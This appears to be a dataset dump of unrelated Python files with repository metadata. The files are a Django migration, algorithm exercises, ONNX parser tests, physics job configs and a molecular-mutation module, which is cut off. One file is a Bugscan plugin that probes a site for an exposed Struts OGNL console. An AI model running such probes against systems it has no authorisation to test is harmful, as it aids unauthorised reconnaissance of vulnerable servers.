('cms', '0008_auto_20150216_1649'),
]
operations = [
migrations.AddField(
model_name='block',
name='language',
field=models.CharField(choices=[('en', 'English'), ('ja', 'Japanese'), ('fr', 'French'), ('es', 'Spanish'), ('pt', 'Portuguese')], default='en-us', max_length=5),
),
migrations.AlterField(
model_name='block',
name='content',
field=models.TextField(blank=True, default=''),
),
migrations.AlterField(
model_name='block',
name='format',
field=models.CharField(choices=[('attr', 'Attribute'), ('plain', 'Plain text'), ('html', 'HTML')], default='plain', max_length=10),
),
migrations.AlterField(
model_name='image',
name='file',
field=models.ImageField(blank=True, upload_to='cms/%y_%m'),
),
migrations.AlterField(
model_name='page',
name='is_live',
field=models.BooleanField(default=True, help_text='If this is not checked, the page will only be visible to logged-in users.'),
),
migrations.AlterField(
model_name='page',
name='template',
field=models.CharField(default='', max_length=255),
),
migrations.AlterField(
model_name='page',
name='url',
field=models.CharField(db_index=True, help_text='e.g. /about/contact', max_length=255, verbose_name='URL'),
),
migrations.AlterUniqueTogether(
name='block',
unique_together=set([('content_type', 'object_id', 'language', 'label')]),
),
]
| [
"[email protected]"
] | |
7e96884df88998e1cd4b4b6f2f635021055b5322 | c317f99691f549b393562db200b1e9504ce11f95 | /algorithms_learn/what_can_be_computed/src/simulateDfa.py | efedb724f8a32d4de40d6a61ff15aa0d1e302d68 | [
"CC-BY-4.0"
] | permissive | RRisto/learning | 5349f9d3466150dbec0f4b287c13333b02845b11 | 618648f63a09bf946a50e896de8aed0f68b5144a | refs/heads/master | 2023-09-01T00:47:23.664697 | 2023-08-30T17:56:48 | 2023-08-30T17:56:48 | 102,286,332 | 15 | 24 | null | 2023-07-06T21:22:48 | 2017-09-03T18:42:58 | Jupyter Notebook | UTF-8 | Python | false | false | 1,135 | py | # SISO program simulateDfa.py
# Simulate a given dfa with a given input.
# dfaString: ASCII description of the dfa M to be simulated
# inString: the initial content I of M's tape
# returns: 'yes' if M accepts I and 'no' otherwise
# Example:
# >>> simulateDfa(rf('multipleOf5.dfa'), '3425735')
# 'yes'
import utils; from utils import rf; from turingMachine import TuringMachine
import re, sys; from dfa import Dfa
def simulateDfa(dfaString, inString):
tm = Dfa(dfaString)
tm.reset(inString)
tmResult = tm.run()
return tmResult
# see testCheckDfa() in checkTuringMachine.py for more detailed tests
def testSimulateDfa():
for (filename, inString, val) in [
('containsGAGA.dfa', 'CCCCCCCCCAAAAAA', 'no'),
('containsGAGA.dfa', 'CCCGAGACCAAAAAA', 'yes'),
('multipleOf5.dfa', '12345', 'yes'),
('multipleOf5.dfa', '1234560', 'yes'),
('multipleOf5.dfa', '123456', 'no'),
]:
result = simulateDfa(rf(filename), inString)
utils.tprint('filename:', filename, 'inString:', inString, 'result:', result)
assert val == result
| [
"[email protected]"
] | |
e92b6a0a8f15c772f6a3f238232ce0d47afa3a9f | ee87e89befa0d4bf353dcf682b6467f9daaf657e | /src/foo_ext/setup_foo.py | 00cab0b82444aae83ea486fa9f58bec6a8b7de40 | [
"BSD-3-Clause",
"MIT"
] | permissive | umedoblock/fugou | 43046056ce5f20b81d76e3c8e3149717b63708ed | 45d95f20bba6f85764fb686081098d92fc8cdb20 | refs/heads/master | 2021-07-15T15:26:30.856753 | 2018-11-26T23:44:18 | 2018-11-26T23:44:18 | 152,105,228 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 639 | py | from distutils.core import setup, Extension
# module_camellia = Extension('camellia', sources = ['camellia/pycamellia.c'])
module_foo = \
Extension('_foo',
sources = ['foo/pyfoo.c'],
extra_link_args=['-Wl,-soname,build/lib.linux-i686-3.2-pydebug/_foo.cpython-32dm.so'])
# build/lib.linux-i686-3.2-pydebug/_foo.cpython-32dm.so
# extra_compile_args=[''])
setup( name = 'sample',
version = '0.0',
author = '梅濁酒(umedoblock)',
author_email = '[email protected]',
url = 'empty',
description = 'This is a foo object package',
ext_modules = [module_foo])
| [
"devnull@localhost"
] | devnull@localhost |
ff10aab701873a6743c66ff43a452b141e61b2e3 | d153c170a4839deb4d8606009be15198418aea69 | /알고리즘풀이/21.07.09/벽부수고이동.py | 9a0c96664f8cbc835b7ed167735d13703b0e7b60 | [] | no_license | rlatmd0829/algorithm | 669085907e2243b4c3a663feab87cd83ff50cc49 | 116bebf16afa6e20d9e968aa312b99b8eea447a5 | refs/heads/master | 2023-08-21T02:27:36.944919 | 2021-09-26T09:39:52 | 2021-09-26T09:39:52 | 345,480,784 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,533 | py | # 시간초과
import collections
n, m = map(int, input().split())
graph = [list(map(int,input())) for _ in range(n)]
dx, dy = [-1,1,0,0], [0,0,-1,1]
def bfs():
queue = collections.deque()
queue.append((0,0))
distance = [[0]*m for _ in range(n)]
while queue:
x, y = queue.popleft()
for i in range(4):
nx = x + dx[i]
ny = y + dy[i]
if 0 <= nx < n and 0 <= ny < m:
if graph[nx][ny] == 0 and distance[nx][ny] == 0:
distance[nx][ny] = distance[x][y] + 1
queue.append((nx,ny))
return distance[n-1][m-1]
result = []
for i in range(n):
for j in range(m):
if graph[i][j] == 1:
graph[i][j] = 0
demo = bfs()
if demo != 0:
result.append(demo)
graph[i][j] = 1
if result:
print(min(result)+1)
else:
print(-1)
##################
from sys import stdin
from collections import deque
N,M = map(int, stdin.readline().split(" "))
map = [list(map(int, stdin.readline().strip())) for _ in range(N)]
# 좌표계산 위한 배열
dx = [-1,1,0,0]
dy = [0,0,1,-1]
curMin = 1000000
def bfs():
global curMin
# 최단경로 저장 배열. 아직 방문 안했다는 표시는 -1로
distances = [[[-1]*2 for _ in range(M)] for _ in range(N)]
# 큐
queue = deque()
queue.append((0,0,0))
distances[0][0][0] = 1
while queue:
x, y, broken = queue.popleft()
for i in range(4):
nx = x + dx[i]
ny = y + dy[i]
if 0 <= nx < N and 0 <= ny <M:
# 부수지 않고 갈 수 있는 경우
if map[nx][ny] == 0 and distances[nx][ny][broken] == -1:
distances[nx][ny][broken] = distances[x][y][broken]+1
queue.append((nx,ny,broken))
# 부숴야만 갈 수 있는 경우
# 지금까지 한번도 안 부쉈어야 한다
# 벽이 있어야 한다
# 방문기록이 없어야 한다
elif broken == 0 and map[nx][ny] == 1 and distances[nx][ny][1] == -1:
distances[nx][ny][1] = distances[x][y][0]+1
queue.append((nx,ny,1))
if distances[N-1][M-1][0] != -1:
curMin = min(curMin, distances[N-1][M-1][0])
if distances[N-1][M-1][1] != -1:
curMin = min(curMin, distances[N-1][M-1][1])
bfs()
if curMin == 1000000:
print(-1)
else:
print(curMin) | [
"[email protected]"
] | |
6053712f6528d72f50dd12642f249150218a7d4c | 651a296c8f45b5799781fd78a6b5329effe702a0 | /bvec/bvec_print.py | a927d2db4dfdd041e9b0fa3dbdc83056ccf7b51a | [] | no_license | pdhhiep/Computation_using_Python | 095d14370fe1a01a192d7e44fcc81a52655f652b | 407ed29fddc267950e9860b8bbd1e038f0387c97 | refs/heads/master | 2021-05-29T12:35:12.630232 | 2015-06-27T01:05:17 | 2015-06-27T01:05:17 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,944 | py | #!/usr/bin/env python
def bvec_print ( n, bvec, title ) :
#*****************************************************************************80
#
## BVEC_PRINT prints a binary integer vector, with an optional title.
#
# Discussion:
#
# A BVEC is an integer vector of binary digits, intended to
# represent an integer. BVEC(1) is the units digit, BVEC(N-1)
# is the coefficient of 2^(N-2), and BVEC(N) contains sign
# information. It is 0 if the number is positive, and 1 if
# the number is negative.
#
# The vector is printed "backwards", that is, the first entry
# printed is BVEC(N).
#
# Licensing:
#
# This code is distributed under the GNU LGPL license.
#
# Modified:
#
# 24 December 2014
#
# Author:
#
# John Burkardt
#
# Parameters:
#
# Input, integer N, the number of components of the vector.
#
# Input, integer BVEC(N), the vector to be printed.
#
# Input, character ( len = * ) TITLE, a title to be printed first.
# TITLE may be blank.
#
if ( 0 < len ( title ) ):
print ''
print title
for ihi in range ( n - 1, -1, -70 ):
ilo = max ( ihi - 70, -1 )
print ' ',
for i in range ( ihi, -1, ilo ):
print '%1d' % ( bvec[i] ),
print ''
return
def bvec_print_test ( ):
#*****************************************************************************80
#
## BVEC_PRINT_TEST tests BVEC_PRINT.
#
# Licensing:
#
# This code is distributed under the GNU LGPL license.
#
# Modified:
#
# 24 December 2014
#
# Author:
#
# John Burkardt
#
import numpy as np
n = 10
bvec = np.array ( [ 1, 0, 0, 1, 0, 1, 1, 1, 0, 0 ] )
print ''
print 'BVEC_PRINT_TEST'
print ' BVEC_PRINT prints a binary vector.'
bvec_print ( n, bvec, ' BVEC:' )
print ''
print 'BVEC_PRINT_TEST'
print ' Normal end of execution.'
return
if ( __name__ == '__main__' ):
from timestamp import timestamp
timestamp ( )
bvec_print_test ( )
timestamp ( )
| [
"[email protected]"
] | |
1539d348092bab286434a5b073c5490382d7dffe | 9f4b1884273f995806c1e755665a92b785cc52a8 | /onnx/test/parser_test.py | 46604593e0c848bd177032dfeda4264980d26494 | [
"Apache-2.0"
] | permissive | zhijl/onnx | 340f7c5794a9aca96d2a9e76c3336aeebe798776 | ac0afea916f989c714692dd8551eff762a639cd5 | refs/heads/main | 2023-03-31T02:30:50.151799 | 2023-03-20T23:09:55 | 2023-03-20T23:09:55 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,295 | py | # SPDX-License-Identifier: Apache-2.0
import unittest
from parameterized import parameterized
import onnx
from onnx import GraphProto, OperatorSetIdProto, checker
class TestBasicFunctions(unittest.TestCase):
def check_graph(self, graph: GraphProto) -> None:
self.assertEqual(len(graph.node), 3)
self.assertEqual(graph.node[0].op_type, "MatMul")
self.assertEqual(graph.node[1].op_type, "Add")
self.assertEqual(graph.node[2].op_type, "Softmax")
def test_parse_graph(self) -> None:
input = """
agraph (float[N, 128] X, float[128,10] W, float[10] B) => (float[N] C)
{
T = MatMul(X, W)
S = Add(T, B)
C = Softmax(S)
}
"""
graph = onnx.parser.parse_graph(input)
self.check_graph(graph)
def test_parse_model(self) -> None:
input = """
<
ir_version: 7,
opset_import: [ "" : 10, "com.microsoft": 1]
>
agraph (float[N, 128] X, float[128,10] W, float[10] B) => (float[N] C)
{
T = MatMul(X, W)
S = Add(T, B)
C = Softmax(S)
}
"""
model = onnx.parser.parse_model(input)
self.assertEqual(model.ir_version, 7)
self.assertEqual(len(model.opset_import), 2)
self.check_graph(model.graph)
def test_parse_graph_error(self) -> None:
input = """
agraph (float[N, 128] X, float[128,10] W, float[10] B) => (float[N] C)
{
T = MatMul[X, W]
S = Add(T, B)
C = Softmax(S)
}
"""
self.assertRaises(
onnx.parser.ParseError, lambda: onnx.parser.parse_graph(input)
)
def test_parse_model_error(self) -> None:
input = """
<
ir_version: 7,
opset_import: [ "" : 10 "com.microsoft": 1]
>
agraph (float[N, 128] X, float[128,10] W, float[10] B) => (float[N] C)
{
T = MatMul(X, W)
S = Add(T, B)
C = Softmax(S)
}
"""
self.assertRaises(
onnx.parser.ParseError, lambda: onnx.parser.parse_model(input)
)
def test_parse_function_with_attributes(self) -> None:
input = """
<
ir_version: 9,
opset_import: [ "" : 15, "custom_domain" : 1],
producer_name: "FunctionProtoTest",
producer_version: "1.0",
model_version: 1,
doc_string: "A test model for model local functions."
>
agraph (float[N] x) => (float[N] out)
{
out = custom_domain.Selu<alpha=2.0, gamma=3.0>(x)
}
<
domain: "custom_domain",
opset_import: [ "" : 15],
doc_string: "Test function proto"
>
Selu
<alpha: float=1.67326319217681884765625, gamma: float=1.05070102214813232421875>
(X) => (C)
{
constant_alpha = Constant<value_float: float=@alpha>()
constant_gamma = Constant<value_float: float=@gamma>()
alpha_x = CastLike(constant_alpha, X)
gamma_x = CastLike(constant_gamma, X)
exp_x = Exp(X)
alpha_x_exp_x = Mul(alpha_x, exp_x)
alpha_x_exp_x_ = Sub(alpha_x_exp_x, alpha_x)
neg = Mul(gamma_x, alpha_x_exp_x_)
pos = Mul(gamma_x, X)
_zero = Constant<value_float=0.0>()
zero = CastLike(_zero, X)
less_eq = LessOrEqual(X, zero)
C = Where(less_eq, neg, pos)
}
"""
model = onnx.parser.parse_model(input)
checker.check_model(model)
@parameterized.expand(
[
(
"agraph (float[N] x) => (float[N] out) { out = custom_domain.Selu(x) }",
{},
),
(
"agraph (float[N] x) => (float[N] out) { out = custom_domain.Selu<alpha=2.0>(x) }",
{"alpha": 2.0},
),
(
"agraph (float[N] x) => (float[N] out) { out = custom_domain.Selu<gamma=3.0>(x) }",
{"gamma": 3.0},
),
(
"agraph (float[N] x) => (float[N] out) { out = custom_domain.Selu<alpha=2.0, gamma=3.0>(x) }",
{"alpha": 2.0, "gamma": 3.0},
),
]
)
def test_composite_parse_function_with_attributes(
self, graph_text: str, expected_attribute: dict
) -> None:
default_alpha = 1.67326319217681884765625
default_gamma = 1.05070102214813232421875
def expect_custom_node_attribute(node, attributes):
for key in attributes:
match_attr = [attr for attr in node.attribute if attr.name == key]
assert len(match_attr) == 1
assert match_attr[0].f == attributes[key]
def expect_model_function_attribute(model):
assert len(model.functions[0].attribute_proto) == 2
attr_proto_alpha = [
attr_proto
for attr_proto in model.functions[0].attribute_proto
if attr_proto.name == "alpha"
]
assert len(attr_proto_alpha) == 1 and attr_proto_alpha[0].f == default_alpha
attr_proto_gamma = [
attr_proto
for attr_proto in model.functions[0].attribute_proto
if attr_proto.name == "gamma"
]
assert len(attr_proto_gamma) == 1 and attr_proto_gamma[0].f == default_gamma
function_text = f"""
<
domain: "custom_domain",
opset_import: [ "" : 15],
doc_string: "Test function proto"
>
Selu
<alpha: float={default_alpha}, gamma: float={default_gamma}>
(X) => (C)
{{
constant_alpha = Constant<value_float: float=@alpha>()
constant_gamma = Constant<value_float: float=@gamma>()
alpha_x = CastLike(constant_alpha, X)
gamma_x = CastLike(constant_gamma, X)
exp_x = Exp(X)
alpha_x_exp_x = Mul(alpha_x, exp_x)
alpha_x_exp_x_ = Sub(alpha_x_exp_x, alpha_x)
neg = Mul(gamma_x, alpha_x_exp_x_)
pos = Mul(gamma_x, X)
_zero = Constant<value_float=0.0>()
zero = CastLike(_zero, X)
less_eq = LessOrEqual(X, zero)
C = Where(less_eq, neg, pos)
}}
"""
functions = [onnx.parser.parse_function(function_text)]
graph = onnx.parser.parse_graph(graph_text)
opset_imports = [
OperatorSetIdProto(domain="", version=15),
OperatorSetIdProto(domain="custom_domain", version=1),
]
model = onnx.helper.make_model(
graph, functions=functions, opset_imports=opset_imports
)
checker.check_model(model)
expect_model_function_attribute(model)
expect_custom_node_attribute(model.graph.node[0], expected_attribute)
if __name__ == "__main__":
unittest.main()
| [
"[email protected]"
] | |
f4a8e3c81ba011c641b4218d7ed3cca00179f752 | e0c8662a56d89730043146ddc340e9e0b9f7de72 | /plugin/14e55cec-1596.py | 7b13f9266669dc060f05fe19bfca14b9054da31c | [] | no_license | izj007/bugscan_poc | f2ef5903b30b15c230b292a1ff2dc6cea6836940 | 4490f3c36d4033bdef380577333722deed7bc758 | refs/heads/master | 2020-09-22T17:20:50.408078 | 2019-01-18T09:42:47 | 2019-01-18T09:42:47 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 720 | py | #coding:utf-8
from lib.curl import *
# -*- coding: utf-8 -*-
"""
POC Name : OGNL console
Author : a
mail : [email protected]
Referer: http://wooyun.org/bugs/wooyun-2010-080076
"""
import urlparse
def assign(service, arg):
if service == 'www':
arr = urlparse.urlparse(arg)
return True, '%s://%s/' % (arr.scheme, arr.netloc)
def audit(arg):
payload = '/struts/webconsole.html'
url = arg + payload
code, head, res, errcode, _ = curl.curl('"%s"' % url)
if code == 200 and "Welcome to the OGNL console" in res:
security_info('find ognl console:' +url)
if __name__ == '__main__':
from dummy import *
audit(assign('www', 'http://www.homilychart.com/')[1])
| [
"[email protected]"
] | |
8787aeb0950cc8d74bb12753045c0ae4d10b16e6 | 17c280ade4159d4d8d5a48d16ba3989470eb3f46 | /18/mc/ExoDiBosonResonances/EDBRTreeMaker/test/crab3_analysisWprime1800.py | 9e802f49450f00b24370cdff361d92b3565fac2c | [] | no_license | chengchen1993/run2_ntuple | 798ff18489ff5185dadf3d1456a4462e1dbff429 | c16c2b203c05a3eb77c769f63a0bcdf8b583708d | refs/heads/master | 2021-06-25T18:27:08.534795 | 2021-03-15T06:08:01 | 2021-03-15T06:08:01 | 212,079,804 | 0 | 2 | null | null | null | null | UTF-8 | Python | false | false | 2,082 | py | from WMCore.Configuration import Configuration
config = Configuration()
config.section_("General")
config.General.requestName = 'Wprime_1800_weight_v2'
config.General.transferLogs = True
config.section_("JobType")
config.JobType.pluginName='Analysis'
config.JobType.sendExternalFolder=True# = 'Analysis'
config.JobType.inputFiles = ['Autumn18_V19_MC_L1FastJet_AK4PFchs.txt','Autumn18_V19_MC_L2Relative_AK4PFchs.txt','Autumn18_V19_MC_L3Absolute_AK4PFchs.txt','Autumn18_V19_MC_L1FastJet_AK8PFchs.txt','Autumn18_V19_MC_L2Relative_AK8PFchs.txt','Autumn18_V19_MC_L3Absolute_AK8PFchs.txt','Autumn18_V19_MC_L1FastJet_AK8PFPuppi.txt','Autumn18_V19_MC_L2Relative_AK8PFPuppi.txt','Autumn18_V19_MC_L3Absolute_AK8PFPuppi.txt','Autumn18_V19_MC_L1FastJet_AK4PFPuppi.txt','Autumn18_V19_MC_L2Relative_AK4PFPuppi.txt','Autumn18_V19_MC_L3Absolute_AK4PFPuppi.txt']
#config.JobType.inputFiles = ['PHYS14_25_V2_All_L1FastJet_AK4PFchs.txt','PHYS14_25_V2_All_L2Relative_AK4PFchs.txt','PHYS14_25_V2_All_L3Absolute_AK4PFchs.txt','PHYS14_25_V2_All_L1FastJet_AK8PFchs.txt','PHYS14_25_V2_All_L2Relative_AK8PFchs.txt','PHYS14_25_V2_All_L3Absolute_AK8PFchs.txt']
# Name of the CMSSW configuration file
#config.JobType.psetName = 'bkg_ana.py'
config.JobType.psetName = 'analysis.py'
#config.JobType.allowUndistributedCMSSW = True
config.JobType.allowUndistributedCMSSW = True
config.section_("Data")
#config.Data.inputDataset = '/WJetsToLNu_13TeV-madgraph-pythia8-tauola/Phys14DR-PU20bx25_PHYS14_25_V1-v1/MINIAODSIM'
config.Data.inputDataset = '/WprimeToWZToWlepZhad_narrow_M-1800_13TeV-madgraph/RunIISummer16MiniAODv2-PUMoriond17_80X_mcRun2_asymptotic_2016_TrancheIV_v6-v1/MINIAODSIM'
config.Data.inputDBS = 'global'
#config.Data.inputDBS = 'phys03'
config.Data.splitting = 'FileBased'
config.Data.unitsPerJob =10
config.Data.totalUnits = -1
config.Data.publication = False
# This string is used to construct the output dataset name
config.Data.outputDatasetTag = 'Wprime_1800_weight_v2'
config.section_("Site")
# Where the output files will be transmitted to
config.Site.storageSite = 'T2_CH_CERN'
| [
"[email protected]"
] | |
3e466dffd0b79a8e26b47596233aa19edadc61ce | 47b4d76e9c87e6c45bab38e348ae12a60a60f94c | /Mutation_Modules/GLN_ASN.py | efbed28aa20e0ca0a3e8faeedc094ac0a4d66aac | [] | no_license | PietroAronica/Parasol.py | 9bc17fd8e177e432bbc5ce4e7ee2d721341b2707 | 238abcdc2caee7bbfea6cfcdda1ca705766db204 | refs/heads/master | 2021-01-10T23:57:40.225140 | 2020-10-14T02:21:15 | 2020-10-14T02:21:15 | 70,791,648 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 15,045 | py | # GLN to ASN Mutation
import Frcmod_creator
import PDBHandler
import Leapy
from parmed.tools.actions import *
from parmed.amber.readparm import *
def parmed_command(vxi='VXI', lipid='No'):
bc = {}
with open('Param_files/AminoAcid/GLN.param', 'r') as b:
data = b.readlines()[1:]
for line in data:
key, value = line.split()
bc[key] = float(value)
b.close()
fc = {}
with open('Param_files/AminoAcid/ASN.param', 'r') as b:
data = b.readlines()[1:]
for line in data:
key, value = line.split()
fc[key] = float(value)
b.close()
for i in range(11):
a = i*10
i = float(i)
parm = AmberParm('Solv_{}_{}.prmtop'.format(a, 100-a))
change(parm, 'charge', ':{}@N'.format(vxi), bc['N']+((fc['N']-bc['N'])/10)*i).execute()
change(parm, 'charge', ':{}@H'.format(vxi), bc['H']+((fc['H']-bc['H'])/10)*i).execute()
change(parm, 'charge', ':{}@CA'.format(vxi), bc['CA']+((fc['CA']-bc['CA'])/10)*i).execute()
change(parm, 'charge', ':{}@HA'.format(vxi), bc['HA']+((fc['HA']-bc['HA'])/10)*i).execute()
change(parm, 'charge', ':{}@CB'.format(vxi), bc['CB']+((fc['CB']-bc['CB'])/10)*i).execute()
change(parm, 'charge', ':{}@HB2'.format(vxi), bc['HB2']+((fc['HB2']-bc['HB2'])/10)*i).execute()
change(parm, 'charge', ':{}@HB3'.format(vxi), bc['HB3']+((fc['HB3']-bc['HB3'])/10)*i).execute()
change(parm, 'charge', ':{}@CG1'.format(vxi), bc['CG']-((bc['CG'])/10)*i).execute()
change(parm, 'charge', ':{}@HB2'.format(vxi), bc['HB2']-((bc['HB2'])/10)*i).execute()
change(parm, 'charge', ':{}@HB3'.format(vxi), bc['HB3']-((bc['HB3'])/10)*i).execute()
change(parm, 'charge', ':{}@CG'.format(vxi), bc['CD']+((fc['CG']-bc['CD'])/10)*i).execute()
change(parm, 'charge', ':{}@OD1'.format(vxi), bc['OE1']+((fc['OD1']-bc['OE1'])/10)*i).execute()
change(parm, 'charge', ':{}@ND2'.format(vxi), bc['NE2']+((fc['ND2']-bc['NE2'])/10)*i).execute()
change(parm, 'charge', ':{}@HD21'.format(vxi), bc['HE21']+((fc['HD21']-bc['HE21'])/10)*i).execute()
change(parm, 'charge', ':{}@HD22'.format(vxi), bc['HE22']+((fc['HD22']-bc['HE22'])/10)*i).execute()
change(parm, 'charge', ':{}@C'.format(vxi), bc['C']+((fc['C']-bc['C'])/10)*i).execute()
change(parm, 'charge', ':{}@O'.format(vxi), bc['O']+((fc['O']-bc['O'])/10)*i).execute()
#print printDetails(parm, ':VXI')
setOverwrite(parm).execute()
parmout(parm, 'Solv_{}_{}.prmtop'.format(a, 100-a)).execute()
def makevxi(struct, out, aa, vxi='VXI'):
struct.residue_dict[aa].set_resname(vxi)
pdb = open(out, 'w')
try:
pdb.write(struct.other_dict['Cryst1'].formatted())
except KeyError:
pass
for res in struct.residue_list:
for atom in res.atom_list:
if atom.get_name() == 'CG' and res.get_resname() == vxi:
pdb.write(atom.change_name('CG1'))
elif atom.get_name() == 'CD' and res.get_resname() == vxi:
pdb.write(atom.change_name('CG'))
elif atom.get_name() == 'OE1' and res.get_resname() == vxi:
pdb.write(atom.change_name('OD1'))
elif atom.get_name() == 'NE2' and res.get_resname() == vxi:
pdb.write(atom.change_name('ND2'))
elif atom.get_name() == 'HE21' and res.get_resname() == vxi:
pdb.write(atom.change_name('HD21'))
elif atom.get_name() == 'HE22' and res.get_resname() == vxi:
pdb.write(atom.change_name('HD22'))
else:
pdb.write(atom.formatted())
try:
pdb.write(struct.other_dict[atom.get_number()].ter())
except:
pass
for oth in struct.other_dict:
try:
if oth.startswith('Conect'):
pdb.write(struct.other_dict[oth].formatted())
except:
pass
pdb.write('END\n')
def variablemake(sym='^'):
var1 = sym + '1'
var2 = sym + '2'
var3 = sym + '3'
var4 = sym + '4'
var5 = sym + '5'
var6 = sym + '6'
var7 = sym + '7'
var8 = sym + '8'
var9 = sym + '9'
var10 = sym + '0'
var11 = sym + 'a'
var12 = sym + 'b'
var13 = sym + 'c'
var14 = sym + 'd'
var15 = sym + 'e'
return var1, var2, var3, var4, var5, var6, var7, var8, var9, var10, var11, var12, var13, var14, var15
def lib_make(ff, outputfile, vxi='VXI', var=variablemake()):
intcar = var[0]
inthyd = var[1]
ctrl = open('lyp.in', 'w')
ctrl.write("source %s\n"%ff)
ctrl.write("%s=loadpdb Param_files/LibPDB/ASN-GLN.pdb\n"%vxi)
ctrl.write('set %s.1.1 element "N"\n'%vxi)
ctrl.write('set %s.1.2 element "H"\n'%vxi)
ctrl.write('set %s.1.3 element "C"\n'%vxi)
ctrl.write('set %s.1.4 element "H"\n'%vxi)
ctrl.write('set %s.1.5 element "C"\n'%vxi)
ctrl.write('set %s.1.6 element "H"\n'%vxi)
ctrl.write('set %s.1.7 element "H"\n'%vxi)
ctrl.write('set %s.1.8 element "C"\n'%vxi)
ctrl.write('set %s.1.9 element "H"\n'%vxi)
ctrl.write('set %s.1.10 element "H"\n'%vxi)
ctrl.write('set %s.1.11 element "C"\n'%vxi)
ctrl.write('set %s.1.12 element "O"\n'%vxi)
ctrl.write('set %s.1.13 element "N"\n'%vxi)
ctrl.write('set %s.1.14 element "H"\n'%vxi)
ctrl.write('set %s.1.15 element "H"\n'%vxi)
ctrl.write('set %s.1.16 element "C"\n'%vxi)
ctrl.write('set %s.1.17 element "O"\n'%vxi)
ctrl.write('set %s.1.1 name "N"\n'%vxi)
ctrl.write('set %s.1.2 name "H"\n'%vxi)
ctrl.write('set %s.1.3 name "CA"\n'%vxi)
ctrl.write('set %s.1.4 name "HA"\n'%vxi)
ctrl.write('set %s.1.5 name "CB"\n'%vxi)
ctrl.write('set %s.1.6 name "HB2"\n'%vxi)
ctrl.write('set %s.1.7 name "HB3"\n'%vxi)
ctrl.write('set %s.1.8 name "CG1"\n'%vxi)
ctrl.write('set %s.1.9 name "HG2"\n'%vxi)
ctrl.write('set %s.1.10 name "HG3"\n'%vxi)
ctrl.write('set %s.1.11 name "CG"\n'%vxi)
ctrl.write('set %s.1.12 name "OD1"\n'%vxi)
ctrl.write('set %s.1.13 name "ND2"\n'%vxi)
ctrl.write('set %s.1.14 name "HD21"\n'%vxi)
ctrl.write('set %s.1.15 name "HD22"\n'%vxi)
ctrl.write('set %s.1.16 name "C"\n'%vxi)
ctrl.write('set %s.1.17 name "O"\n'%vxi)
ctrl.write('set %s.1.1 type "N"\n'%vxi)
ctrl.write('set %s.1.2 type "H"\n'%vxi)
ctrl.write('set %s.1.3 type "CT"\n'%vxi)
ctrl.write('set %s.1.4 type "H1"\n'%vxi)
ctrl.write('set %s.1.5 type "CT"\n'%vxi)
ctrl.write('set %s.1.6 type "HC"\n'%vxi)
ctrl.write('set %s.1.7 type "HC"\n'%vxi)
ctrl.write('set %s.1.8 type "%s"\n'%(vxi, intcar))
ctrl.write('set %s.1.9 type "%s"\n'%(vxi, inthyd))
ctrl.write('set %s.1.10 type "%s"\n'%(vxi, inthyd))
ctrl.write('set %s.1.11 type "C"\n'%vxi)
ctrl.write('set %s.1.12 type "O"\n'%vxi)
ctrl.write('set %s.1.13 type "N"\n'%vxi)
ctrl.write('set %s.1.14 type "H"\n'%vxi)
ctrl.write('set %s.1.15 type "H"\n'%vxi)
ctrl.write('set %s.1.16 type "C"\n'%vxi)
ctrl.write('set %s.1.17 type "O"\n'%vxi)
ctrl.write('bond %s.1.1 %s.1.2\n'%(vxi, vxi))
ctrl.write('bond %s.1.1 %s.1.3\n'%(vxi, vxi))
ctrl.write('bond %s.1.3 %s.1.4\n'%(vxi, vxi))
ctrl.write('bond %s.1.3 %s.1.5\n'%(vxi, vxi))
ctrl.write('bond %s.1.3 %s.1.16\n'%(vxi, vxi))
ctrl.write('bond %s.1.5 %s.1.6\n'%(vxi, vxi))
ctrl.write('bond %s.1.5 %s.1.7\n'%(vxi, vxi))
ctrl.write('bond %s.1.5 %s.1.8\n'%(vxi, vxi))
ctrl.write('bond %s.1.8 %s.1.9\n'%(vxi, vxi))
ctrl.write('bond %s.1.8 %s.1.10\n'%(vxi, vxi))
ctrl.write('bond %s.1.8 %s.1.11\n'%(vxi, vxi))
ctrl.write('bond %s.1.11 %s.1.12\n'%(vxi, vxi))
ctrl.write('bond %s.1.11 %s.1.13\n'%(vxi, vxi))
ctrl.write('bond %s.1.13 %s.1.14\n'%(vxi, vxi))
ctrl.write('bond %s.1.13 %s.1.15\n'%(vxi, vxi))
ctrl.write('bond %s.1.16 %s.1.17\n'%(vxi, vxi))
ctrl.write('set %s.1 connect0 %s.1.N\n'%(vxi, vxi))
ctrl.write('set %s.1 connect1 %s.1.C\n'%(vxi, vxi))
ctrl.write('set %s name "%s"\n'%(vxi, vxi))
ctrl.write('set %s.1 name "%s"\n'%(vxi, vxi))
ctrl.write('set %s head %s.1.N\n'%(vxi, vxi))
ctrl.write('set %s tail %s.1.C\n'%(vxi, vxi))
ctrl.write('saveoff %s %s.lib\n'%(vxi, vxi))
ctrl.write("quit\n")
ctrl.close()
Leapy.run('lyp.in', outputfile)
def all_make():
for i in range(0,110,10):
Frcmod_creator.make ('{}_{}.frcmod'.format(i, 100-i))
def cal(x, y, i):
num = x+((y-x)/10)*i
return num
def lac(y, x, i):
num = x+((y-x)/10)*i
return num
def stock_add_to_all(var=variablemake()):
intcar = var[0]
inthyd = var[1]
Frcmod_creator.make_hyb()
Frcmod_creator.TYPE_insert(intcar, 'C', 'sp3')
Frcmod_creator.TYPE_insert(inthyd, 'H', 'sp3')
p = {}
with open('Param_files/Stock/Stock.param', 'r') as b:
data = b.readlines()[1:]
for line in data:
p[line.split()[0]] = []
for point in line.split()[1:]:
p[line.split()[0]].append(float(point))
b.close()
for i in range(11):
a = i*10
Frcmod_creator.MASS_insert('{}_{}.frcmod'.format(a, 100-a), intcar, lac(p['0_C'][0], p['CT'][0], i), lac(p['0_C'][1], p['CT'][1], i))
Frcmod_creator.MASS_insert('{}_{}.frcmod'.format(a, 100-a), inthyd, lac(p['0_H'][0], p['HC'][0], i), lac(p['0_H'][1], p['HC'][1], i))
Frcmod_creator.BOND_insert('{}_{}.frcmod'.format(a, 100-a), '{}-{}'.format('CT', intcar), lac(p['CT_mC'][0], p['CT_CT'][0], i), lac(p['CT_mC'][1], p['CT_CT'][1], i))
